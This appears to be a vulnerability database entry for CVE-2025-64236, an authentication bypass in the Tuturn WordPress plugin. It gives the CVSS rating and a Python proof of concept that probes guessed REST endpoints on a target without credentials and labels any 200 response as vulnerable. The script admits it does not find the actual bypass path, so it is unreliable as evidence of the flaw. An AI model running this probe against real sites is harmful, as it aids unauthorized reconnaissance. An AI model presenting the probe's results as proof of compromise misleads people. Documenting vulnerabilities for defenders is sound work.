Authentication Bypass Using an Alternate Path or Channel vulnerability in AmentoTech Tuturn allows Authentication Abuse.This issue affects Tuturn: from n/a before 3.6.
CVSS Details
CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Configurations (Affected Products)
No configuration data available.
AmentoTech Tuturn < 3.6
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64236 PoC - Authentication Bypass in Tuturn WordPress Plugin
# This PoC demonstrates the authentication bypass vulnerability
import requests
import sys
def check_vulnerability(target_url):
"""
Check if target is vulnerable to CVE-2025-64236
"""
# Target endpoint that may bypass authentication
endpoints = [
'/wp-json/tuturn/v1/user/profile',
'/wp-json/tuturn/v1/admin/settings',
'/wp-json/tuturn/v1/auth/login',
'/wp-json/tuturn/v1/bookings/create',
'/wp-json/tuturn/v1/payments/process'
]
print(f"[*] Testing target: {target_url}")
print(f"[*] CVE-2025-64236 - Tuturn Authentication Bypass\n")
for endpoint in endpoints:
url = target_url.rstrip('/') + endpoint
try:
# Send unauthenticated request to potential bypass endpoint
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
'Content-Type': 'application/json'
}
response = requests.get(url, headers=headers, timeout=10, verify=False)
# Check if response indicates successful bypass
if response.status_code == 200:
print(f"[+] VULNERABLE: {url}")
print(f" Status: {response.status_code}")
print(f" Response: {response.text[:200]}...")
elif response.status_code == 401:
print(f"[-] Protected: {url}")
else:
print(f"[?] Unknown: {url} - Status: {response.status_code}")
except requests.exceptions.RequestException as e:
print(f"[!] Error testing {url}: {str(e)}")
print("\n[*] Note: This is a basic PoC. Full exploitation requires identifying specific bypass path.")
print("[*] Reference: https://patchstack.com/database/wordpress/plugin/tuturn/vulnerability/wordpress-tuturn-plugin-3-6-broken-authentication-vulnerability")
if __name__ == '__main__':
if len(sys.argv) < 2:
print("Usage: python poc.py <target_url>")
print("Example: python poc.py http://example.com")
sys.exit(1)
target = sys.argv[1]
check_vulnerability(target)